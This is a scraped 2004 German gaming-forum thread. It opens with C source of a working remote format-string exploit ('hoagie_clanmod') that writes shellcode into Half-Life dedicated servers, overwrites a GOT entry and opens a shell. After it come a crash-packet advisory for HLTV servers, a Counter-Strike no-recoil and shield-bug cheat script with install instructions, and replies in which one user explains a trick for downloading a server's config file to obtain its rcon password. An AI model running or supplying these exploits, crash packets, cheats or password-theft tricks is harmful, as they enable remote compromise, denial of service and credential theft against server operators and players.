void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
char reply[1000];
char msg[2000];
lowlevel_rcon(sock,host,port,"challenge rcon",reply);
if(!strstr(reply,"challenge rcon "))
fprintf(stderr,"protocol error\n"), exit(1);
reply[strlen(reply)-1]=0;
sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
if(reply_fun)
lowlevel_rcon(sock,host,port,msg,reply);
else
lowlevel_rcon(sock,host,port,msg,NULL);
if(reply_fun)
strcpy(reply_fun,reply);
}
int get_padding(unsigned char c,int bytes_written)
{
int write_byte=c;
int already_written=bytes_written;
int padding;
write_byte+=0x100;
already_written%=0x100;
padding=(write_byte-already_written)%0x100;
if(padding<10) padding+=0x100;
return padding;
}
void get_write_paddings(unsigned long addr, int *p1, int *p2, int *p3,
int *p4, int bytes_written)
{
// greetings to scud :-)
int write_byte;
int already_written;
int padding;
write_byte=SB1(addr);
already_written=bytes_written;
write_byte+=0x100;
already_written%=0x100;
padding=(write_byte-already_written)%0x100;
if(padding<10) padding+=0x100;
*p1=padding;
write_byte=SB2(addr);
already_written+=padding;
write_byte+=0x100;
already_written%=0x100;
padding=(write_byte-already_written)%0x100;
if(padding<10) padding+=0x100;
*p2=padding;
write_byte=SB3(addr);
already_written+=padding;
write_byte+=0x100;
already_written%=0x100;
padding=(write_byte-already_written)%0x100;
if(padding<10) padding+=0x100;
*p3=padding;
write_byte=SB4(addr);
already_written+=padding;
write_byte+=0x100;
already_written%=0x100;
padding=(write_byte-already_written)%0x100;
if(padding<10) padding+=0x100;
*p4=padding;
}
int main(int argc, char **argv)
{
int sock, stackpops, padding;
int i,j,bytes_written;
int p1,p2,p3,p4;
char cmd[1000], reply[1000];
unsigned long addr;
printf("hoagie_clanmod - remote exploit for hlds servers using the clanmod plugin\n"
"by greuff@void.at\n\n");
if(argc!=4)
{
printf("Usage: %s server_ip server_port rcon_password\n\n",argv[0]);
exit(1);
}
strcpy(server_ip,argv[1]);
server_port=strtol(argv[2],NULL,10);
strcpy(rcon_pwd,argv[3]);
create_conn(&sock,server_ip,server_port);
printf("Getting stackpop count...");
send_rcon(sock,server_ip,server_port,rcon_pwd,"log on",reply);
stackpops=-1;
for(padding=0;padding<4 && stackpops==-1;padding++)
{
for(i=50;i<100 && stackpops==-1;i++)
{
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
sprintf(reply,"AAAA%%%d$08x",i);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
reply[strlen(reply)-1]=0;
if(strstr(reply,"AAAA41414141"))
{
stackpops=i;
strcpy(cmd,strchr(reply,'['));
bytes_written=strlen(cmd)-8;
}
printf(".");
fflush(stdout);
}
}
padding--;
if(stackpops==-1)
{
printf("\ncouldn't determine stackpop count. (I really tried hard!)\n");
exit(1);
}
printf("\nStackpops found: %d, Padding: %d\n",stackpops,padding);
// inject shellcode
printf("Writing shellcode...");
addr=OFFSET;
for(i=0;i<strlen(shellcode);)
{
int t;
if((addr&0xFF)>0x75)
{
// leave space for jmp-instruction (5 bytes: 0xe9 offset/32)
// distance is 0x13B-0x7A = 193d
unsigned long target=192;
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding(0xe9,bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr++;
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding(target&0xFF,bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr++;
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding((target>>8)&0xFF,bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr++;
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding((target>>16)&0xFF,bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr++;
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding((target>>24)&0xFF,bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr+=193;
}
else
{
// write shellcode-pieces
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
t=get_padding(shellcode[i],bytes_written);
sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
(addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
addr++;
i++;
}
printf(".");
fflush(stdout);
}
// overwrite GOT entry with shellcode address
strcpy(cmd,"cm_log ");
for(j=0;j<padding;j++) strcat(cmd,"b");
get_write_paddings(OFFSET,&p1,&p2,&p3,&p4,bytes_written+28);
addr=VSNPRINTF_GOT_ADDRESS;
sprintf(reply,"%c%c%c%cAAAA%c%c%c%cAAAA%c%c%c%cAAAA%c%c%c%cAAAA"
"%%%du%%%d$n%%%du%%%d$n%%%du%%%d$n%%%du%%%d$n",
addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,
(addr+1)&0xFF,((addr+1)>>8)&0xFF,((addr+1)>>16)&0xFF,((addr+1)>>24)&0xFF,
(addr+2)&0xFF,((addr+2)>>8)&0xFF,((addr+2)>>16)&0xFF,((addr+2)>>24)&0xFF,
(addr+3)&0xFF,((addr+3)>>8)&0xFF,((addr+3)>>16)&0xFF,((addr+3)>>24)&0xFF,
p1,stackpops,p2,stackpops+2,p3,stackpops+4,p4,stackpops+6);
strcat(cmd,reply);
send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,NULL);
sleep(1);
close(sock);
printf("\nConnecting to the shell...\n");
exec_sh(connect_sh());
return 0;
} Code: HLTV offers the ability to have thousands of spectators watch online games on Half-Life-servers. Overview ======== By sending a specially crafted packet to the hltv-server, an attacker can cause the server to crash. Affected Versions ================= The one that comes with hlds 3.1.1.0; possibly others. Impact ====== Medium. The remote server simply crashes. Details ======= Packets querying things like player-status etc always start with \xff\xff\xff\xff, followed by a query command and terminated by a \0. When you simply send \xff\xff\xff\xff\0 to the server, it crashes. Solution ======== Vendor patch needed! Exploit ======= Come on :-) Discovered by ============= greuff <greuff@void.at> Credits ======= void.at everyone who was at 19c3 Shieldscript: Erstelle Commandmenu.txt: Code: " " "Shieldscript by d0ne" "say_team Shieldscript -> mpcheatz.com | unknowncheats.de"
"1" "Norecoil (Pistols)"
{
"1" "9x19mm Sidearm" "bind mouse1 +attgl"
"2" "KM .45 Tactical" "bind mouse1 +attusp"
"3" "228 Compact" "bind mouse1 +att228"
"4" "Night Hawk .50C" "bind mouse1 +attdea"
"5" "ES Five-Seven" "bind mouse1 +attfive"
"6" "Unbind" "bind mouse1 +attack"
}
"2" "Shieldbug 1"
{
"1" "Shield kaufen" "buy_shield"
"2" "Bug mit..."
{
"1" "9x19mm" "shieldbugglock"
"2" "KM .45" "shieldbugusp"
"3" "228" "shieldbug228"
"4" "Night Hawk" "shieldbugdea"
"5" "Five-Seven" "shieldbugfive"
}
}
"3" "Shieldbug 2"
{
"1" "Aktivieren" "bind mouse1 +shieldbug2"
} Code: alias -ssens "sensitivity 4.1" Code: exec sensitivity.cfg // shieldscript v1.0 by d0ne' alias ms1 "menuselect 1" alias ms2 "menuselect 2" alias ms3 "menuselect 3" alias ms4 "menuselect 4" alias ms5 "menuselect 5" alias ms6 "menuselect 6" alias ms7 "menuselect 7" alias ms8 "menuselect 8" alias ms9 "menuselect 9" alias ms0 "slot10; wa2; slot10; slot10; wa2; slot10; slot10; wa2; slot10; slot10; wa2; slot10" alias wa "wait" alias wa2 "wa; wa" alias wa3 "wa; wa2" alias wa4 "wa2; wa2" alias wa8 "wa4; wa4" alias +ssens "sensitivity 1.9" alias buy_sec "buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2" alias buy_shield "buyequip; ms8; weapon_knife; say_team shield'; wa2; ms0" alias shieldbugglock "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms1; wa; buy_sec" alias shieldbugusp "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms2; wa; buy_sec" alias shieldbug228 "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms3; wa; buy_sec" alias shieldbugdea "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms4; wa; buy_sec" alias shieldbugfive "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms5; wa; buy_sec" alias +attgl "+ssens; wa; +speed; wa; cl_pitchspeed 0.3; +lookdown; wa; +attack" alias -attgl "-ssens; wa; -speed; wa; cl_pitchspeed 0.3; -lookdown; wa; -attack" alias +attusp "+ssens; wa; +speed; wa; cl_pitchspeed 1.4; +lookdown; wa; +attack" alias -attusp "-ssens; wa; -speed; wa; cl_pitchspeed 1.4; -lookdown; wa; -attack" alias +att228 "+ssens; wa; +speed; wa; cl_pitchspeed 1.0; +lookdown; wa; +attack" alias -att228 "-ssens; wa; -speed; wa; cl_pitchspeed 1.0; -lookdown; wa; -attack" alias +attdea "+ssens; wa; +speed; wa; cl_pitchspeed 3.9; +lookdown; wa; +attack" alias -attdea "-ssens; wa; -speed; wa; cl_pitchspeed 3.9; -lookdown; wa; -attack" alias +attfive "+ssens; wa; +speed; wa; cl_pitchspeed 0.6; +lookdown; wa; +attack" alias -attfive "-ssens; wa; -speed; wa; cl_pitchspeed 0.6; -lookdown; wa; -attack" alias +shieldbug2 "buy_shield; wa8; buyequip; ms4; wa; weapon_hegrenade; wa; +attack" alias -shieldbug2 "drop; wa4; -attack; bind mouse1 +attack" Code: -------------> INSTALLATION <------------- Einfach alle Dateien aus dem shieldscript Ordner in euren cstrike Ordner kopieren (steam\steamapps\euremailadresse\cstrike)! Nun bitte die sensitivity.cfg mit dem Notpad öffnen und eure Mausgeschwindigkeit eintragen. Die Datei ist wie folgt aufgebaut: alias -ssens "sensitivity 4.1" Wenn ihr eine Mausgeschwindigkeit von 3.6 habt, dann müsst ihr das so eintragen: alias -ssens "sensitivity 3.6" Nun einfach die Datei speichern und das Script ist fertig eingestellt. -------------> SHIELDBUG 1 <------------- Das Script wird komplett über das Commandmenu im Spiel gesteuert! Wir gehen davon aus, das ihr als CT mit der USP und genug Geld für Shield + anderer Pistole startet. Geht nun in das Commandmenu unter "Shieldbug 1" und "Shield kaufen". Ihr kauft damit ein Shield ohne irgend- welche anderen Sachen. Nun geht ihr wieder ins COmmandmenu und wählt "Shieldbug 1" und "Bug mit..." an um euch die Pistole auszusuchen, mit der ihr den BUg benutzen wollt. Damit der Bug richtig funktioniert, dürft ihr beim ersten mal keine USP kaufen (als ct habt ihr ja schon eine) sondern müsst eine andere Pistole auswählen und kaufen. Der BUg funktioniert nur, wenn ihr jede Runde eine andere Pistole kauft. Als Beispiel wählen wir die "Night Hawk" aus. Nun haben wir das Shield, die Night Hawk und genug Munition gekauft und der BUg ist auch aktiviert. Jetzt ist noch das Menu für die Pistolen offen, das ihr einfach mit der Taste 0 wieder schliesst. Während ihr den Bug benutzt, dürft ihr NUR mit Maus1 schiessen (kein Waffenwechsel oder Granaten wählen! Nachladen könnt ihr aber ganz normal!!!). Um jetzt nicht jede Runde ein neues Shield und Pistole kaufen zumüssen, reicht es aus einfach bei jeder neuen Runde unter "Shieldbug 1" "Bug mit..." eine andere Pistole zukaufen. So spiele ich immer: 1. "Shieldbug 1" "Shield kaufen". Nun habe ich ein Shield 2. "Shieldbug 1" "BUg mit..." und wähle die Deagle aus. 3. Habe nun die Deagle, Shield und genug Munition. Das Pistolemenu mit 0 schliessen! 4. Nächste Runde mit "Schieldbug 1" "Bug mit..." die USP kaufen 5. Nach dieser Runde mit "Shieldbug 1" "Bug mit..." die Deagle kaufen 6. Das ganze immer abwechselnd (Deagle usp, usp deagle)! -------------> SHIELDBUG 2 <------------- Ihr solltet am Startpunkt stehen, damit ihr einkaufen könnt. Jetzt einfach unter "Shielbug 2" und "Aktivieren" auswählen. Nun haltet die Maustaste 1 gedrückt, ihr kauft nun automatich ein Shield und eine He ein und dann lasst die Taste wieder los. Ihr werft jetzt automatisch das Shield weg und setzt zum Hewurf an. Wartet nun bis er die He geworfen hat und sammelt das Shield wieder auf. Wundert euch ein bisschen :D Bitte auch hier nicht mehr die Waffe wechseln! P.S Ihr seit obwohl ihr nichts seht, trotzdem durch das Shield gesichert !!! -------------> NORECOIL (PISTOLEN) <------------- Ihr könnt wahlweise für jede einzelne Pistole (im Einsatz mit dem Shield und SHIELDBUG 1) ein norecoil dazuschalten. Einfach unter "Norecoil (Pistolen)" und dann die Pistole auswählen. Um es auszustellen einfach auf "unbind" gehen. UCR |
|
|  |
|
04.02.2004, 20:03
|
- 2 |
| Gast
Beiträge: n/a
| Fett sonst braucht es keine worte ! Gr33tz S4vi |
|
| |
| Werbung | |
| |
--
|
|
04.02.2004, 20:05
|
- 3 |
| Neuer Benutzer Registriert seit: 17.07.2003
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
Wow!Ned schlechte herr specht!
|
| |
|
04.02.2004, 22:10
|
- 4 |
| Neuer Benutzer Registriert seit: 06.05.2003
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
Sieht gut aus. Wie funktionieren genau die bugs. Fuer was sind die ? |
|
| |
|
05.02.2004, 14:01
|
- 5 |
| Gast
Beiträge: n/a
|
öhm sry, aber die ganzen headshot scripts die im mom anscheinend im umlauf sind sind ja wohl totale kacke oder? das hier auch, obwohl das hier eigentlich kaum noch nach oben guckt oder so... aber man kann beim schiessen net mehr vernünftig aimen, weils alles total verwacklt ... oder sieht von euch einer nen vorteil dardrin?
|
|
| |
|
05.02.2004, 15:21
|
- 6 |
| Neuer Benutzer Registriert seit: 19.10.2003
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
mal testen ob geht :P
|
|
| |
|
05.02.2004, 15:47
|
- 7 | |
| Gast
Beiträge: n/a
| Zitat:
| |
|
| |
|
07.02.2004, 14:23
|
- 8 |
| Gast
Beiträge: n/a
|
mal ne frage zum Server Crash script. Also habe diese Langen zeilen also die aliasen in meine autoexec gepackt und den bind in die Config... Funktioniert das auch ? irgendwie klappt das nich Achso war eben auf einem Server drauf und habe p gedrückt aber es ist nichts passieert. |
|
| |
|
07.02.2004, 14:54
|
- 9 |
| Neuer Benutzer Registriert seit: 18.06.2003
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
1. ist server crash doof....  (stell dir vor es wär dein server!)2. die meißten server haben ein anti floating teil eingebaut was das crashen verhindert! 3. der server anbieder sieht die logs und sieht deine ip  )gruß subay |
|
| |
|
07.02.2004, 15:14
|
- 10 |
| Neuer Benutzer Registriert seit: 01.05.2003
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
Ihr immer mit dem Sch3|ss "Stell Dir vor,es wäre Dein Server" Stellt Euch Cheater mal vor,es wäre Euer Spiel,das gehackt wird und den fairen Spielern den Spass versaun,die ja schliesslich auch für das Spiel bezahlt haben !!Also,labbert net so`n BS ,denn alles was hier zum downloaden gibt zerstört irgendwie die Fairniss und dazu ist das Board ja auch da :evil: Mit dem Rcon Mist genauso...Cheaten und Bug ausnutzen in CS etc. darf wohl jeder,aber wie man durch einen Bug das rcon PW rausbekommt,das wird mal wieder als "Stellt Euch vor,es wäre Euer Server" behandelt :baby: Rcon INFO: Löscht im cstrike Ordner die Server.cfg(oder umbenennen),dann auf einen beliebigen Server connecten und in die Console "cmd dlfile server.cfg" eingeben...Schwups erstellt der Bug Euch ne neue server.cfg im cstrike Ordner...Das klappt zwar net auf allen Servern,aber der größte Teil der Serverhoster,hat diesen Bug noch net gefixt  So,alle Geheimnisse ausgeplaudert :tongue:
|
|
| |
|
07.02.2004, 16:19
|
- 11 |
| Gast
Beiträge: n/a
|
Schöne Erklärung Aber trotzdem ist meine Frage noch immer nicht geklärt. Wie kann ich das "Crash Script" benutzen. Denkt dran ich bracuhe ne genaue Erklärung denn :359: :350: |
|
| |
|
07.02.2004, 16:50
|
- 12 |
| Gast
Beiträge: n/a
|
ich glaube das geht nur bei 1.5
|
|
| |
 |
Linear-Darstellung
| |
Alle Zeitangaben in WEZ +2. Es ist jetzt 21:44 Uhr.